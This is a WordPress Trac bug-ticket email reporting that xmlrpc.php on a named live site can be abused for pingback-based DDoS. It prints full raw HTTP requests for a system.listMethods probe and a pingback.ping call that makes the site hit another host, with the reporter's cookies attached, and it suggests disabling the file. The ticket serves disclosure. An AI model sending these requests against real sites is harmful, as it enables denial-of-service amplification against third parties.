[wp-trac] [WordPress Trac] #47551: xmlrpc.php FILE is enable .It can be used for bruteforce attack and denial of service

WordPress Trac noreply at wordpress.org
Mon Jun 17 14:37:06 UTC 2019 

#47551: xmlrpc.php FILE is enable .It can be used for bruteforce attack and denial
of service
----------------------------+-----------------------------
 Reporter:  pranayjain2511  |      Owner:  (none)
     Type:  defect (bug)    |     Status:  new
 Priority:  normal          |  Milestone:  Awaiting Review
Component:  XML-RPC         |    Version:  5.0.1
 Severity:  normal          |   Keywords:  needs-patch
  Focuses:                  |
----------------------------+-----------------------------
 https://blog.optimizely.com/ is wordpress site

 Wordpress that have xmlrpc.php enabled for pingbacks, trackbacks, etc. can
 be made as a part of a huge botnet causing a major DDOS. The website
 https://blog.optimizely.com/ has the xmlrpc.php file enabled and could
 thus be potentially used for such an attack against other victim hosts.
 In order to determine whether the xmlrpc.php file is enabled or not, using
 the Repeater tab in Burp, send the request below.

 POST /xmlrpc.php HTTP/1.1
 Host: blog.optimizely.com
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
 Firefox/60.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Cookie: optimizelyEndUserId=appuid1560332752535r0.612773859597;
 ajs_user_id=null; ajs_group_id=null; _ga=GA1.2.1174789383.1560332759;
 ajs_anonymous_id=%22c0afa840-96c3-49f6-a1b2-6aba203b1da1%22;
 OptanonConsent=landingPath=NotLandingPage&datestamp=Sat+Jun+15+2019+14%3A19%3A09+GMT%2B0530+(IST)&version=4.4.0&EU=false&groups=0_137018%3A1%2C0_137037%3A1%2C1%3A1%2C0_83485%3A1%2C0_84623%3A1%2C123%3A1%2C2%3A1%2C0_137040%3A1%2C3%3A1%2C154%3A1%2C4%3A1%2C0_85305%3A1%2C173%3A1%2C0_87040%3A1%2C101%3A1%2C0_84626%3A1%2C0_87042%3A1%2C0_83478%3A1%2C0_137008%3A1%2C0_137015%3A1%2C0_137039%3A1%2C117%3A1%2C0_137131%3A1%2C0_137030%3A1%2C132%3A1%2C128%3A1%2C164%3A1%2C0_85872%3A1%2C0_85873%3A1%2C0_137012%3A1%2C0_137059%3A1%2C0_83482%3A1%2C0_83484%3A1%2C0_83483%3A1&AwaitingReconsent=false;
 _gcl_au=1.1.17915353.1560333353; marketo_utm_content=webpromo-
 login1-everyone; marketo_utm_medium=referral;
 marketo_utm_source=optimizely; _mkto_trk=id:361-GER-922&token:_mch-
 optimizely.com-1560333355657-34661;
 amplitude_id_12138f24f4eb62c4ce13454cf1876f9doptimizely.com=eyJkZXZpY2VJZCI6ImYwZDdjMTc1LTc4NzYtNDg3My1hNTBlLWNlMGFjMGQ2YTQyN1IiLCJ1c2VySWQiOm51bGwsIm9wdE91dCI6ZmFsc2UsInNlc3Npb25JZCI6MTU2MDU4ODQwNTU1NSwibGFzdEV2ZW50VGltZSI6MTU2MDU4ODU3MTcwMCwiZXZlbnRJZCI6MTYsImlkZW50aWZ5SWQiOjMsInNlcXVlbmNlTnVtYmVyIjoxOX0=;
 _fbp=fb.1.1560333359887.541662801; __qca=P0-1900880018-1560333359980;
 _gid=GA1.2.871921774.1560541163;
 sgPopupDetails4=%7B%22popupId%22%3A%224%22%2C%22openCounter%22%3A1%2C%22openLimit%22%3A%221%22%7D;
 amplitude_idundefinedoptimizely.com=eyJvcHRPdXQiOmZhbHNlLCJzZXNzaW9uSWQiOm51bGwsImxhc3RFdmVudFRpbWUiOm51bGwsImV2ZW50SWQiOjAsImlkZW50aWZ5SWQiOjAsInNlcXVlbmNlTnVtYmVyIjowfQ==
 Connection: close
 Upgrade-Insecure-Requests: 1
 Cache-Control: max-age=0
 Content-Length: 93

 <methodCall>
 <methodName>system.listMethods</methodName>
 <params>
 </params>
 </methodCall>

 Notice that a successful response is received showing that the xmlrpc.php
 file is enabled.
 Now, considering the domain https://blog.optimizely.com, the xmlrpc.php
 file discussed above could potentially be abused to cause a DDOS attack
 against a victim host. This is achieved by simply sending a request that
 looks like below.

 As soon as the above request is sent, the victim host
 (http://hackersera.com) gets an entry in its log file with a request
 originating from the https://blog.optimizely.com domain verifying the
 pingback.

 remediation:

 If the XMLRPC.php file is not being used, it should be disabled and
 removed completely to avoid any potential risks. Otherwise, it should at
 the very least be blocked from external access.

 thanks

 note: screenshots are given below

 http request
 POST /xmlrpc.php HTTP/1.1
 Host: blog.optimizely.com
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
 Firefox/60.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Cookie: optimizelyEndUserId=appuid1560332752535r0.612773859597;
 ajs_user_id=null; ajs_group_id=null; _ga=GA1.2.1174789383.1560332759;
 ajs_anonymous_id=%22c0afa840-96c3-49f6-a1b2-6aba203b1da1%22;
 OptanonConsent=landingPath=NotLandingPage&datestamp=Sat+Jun+15+2019+14%3A19%3A09+GMT%2B0530+(IST)&version=4.4.0&EU=false&groups=0_137018%3A1%2C0_137037%3A1%2C1%3A1%2C0_83485%3A1%2C0_84623%3A1%2C123%3A1%2C2%3A1%2C0_137040%3A1%2C3%3A1%2C154%3A1%2C4%3A1%2C0_85305%3A1%2C173%3A1%2C0_87040%3A1%2C101%3A1%2C0_84626%3A1%2C0_87042%3A1%2C0_83478%3A1%2C0_137008%3A1%2C0_137015%3A1%2C0_137039%3A1%2C117%3A1%2C0_137131%3A1%2C0_137030%3A1%2C132%3A1%2C128%3A1%2C164%3A1%2C0_85872%3A1%2C0_85873%3A1%2C0_137012%3A1%2C0_137059%3A1%2C0_83482%3A1%2C0_83484%3A1%2C0_83483%3A1&AwaitingReconsent=false;
 _gcl_au=1.1.17915353.1560333353; marketo_utm_content=webpromo-
 login1-everyone; marketo_utm_medium=referral;
 marketo_utm_source=optimizely; _mkto_trk=id:361-GER-922&token:_mch-
 optimizely.com-1560333355657-34661;
 amplitude_id_12138f24f4eb62c4ce13454cf1876f9doptimizely.com=eyJkZXZpY2VJZCI6ImYwZDdjMTc1LTc4NzYtNDg3My1hNTBlLWNlMGFjMGQ2YTQyN1IiLCJ1c2VySWQiOm51bGwsIm9wdE91dCI6ZmFsc2UsInNlc3Npb25JZCI6MTU2MDU4ODQwNTU1NSwibGFzdEV2ZW50VGltZSI6MTU2MDU4ODU3MTcwMCwiZXZlbnRJZCI6MTYsImlkZW50aWZ5SWQiOjMsInNlcXVlbmNlTnVtYmVyIjoxOX0=;
 _fbp=fb.1.1560333359887.541662801; __qca=P0-1900880018-1560333359980;
 _gid=GA1.2.871921774.1560541163;
 sgPopupDetails4=%7B%22popupId%22%3A%224%22%2C%22openCounter%22%3A1%2C%22openLimit%22%3A%221%22%7D;
 amplitude_idundefinedoptimizely.com=eyJvcHRPdXQiOmZhbHNlLCJzZXNzaW9uSWQiOm51bGwsImxhc3RFdmVudFRpbWUiOm51bGwsImV2ZW50SWQiOjAsImlkZW50aWZ5SWQiOjAsInNlcXVlbmNlTnVtYmVyIjowfQ==
 Connection: close
 Upgrade-Insecure-Requests: 1
 Cache-Control: max-age=0
 Content-Length: 234

 <methodCall>
 <methodName>pingback.ping</methodName>
 <params>
 <param><value><string>http://hackersera.com</string></value></param>
 <param><value><string>https://blog.optimizely.com</string></value></param>
 </params>
 </methodCall>

 NOte : Please find attachments for POc In the following URL :
 https://drive.google.com/folderview?id=18ZR6OK8WH2FnFu2vviw5EvyvWu5qMbEn

-- 
Ticket URL: <https://core.trac.wordpress.org/ticket/47551>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform

More information about the wp-trac mailing list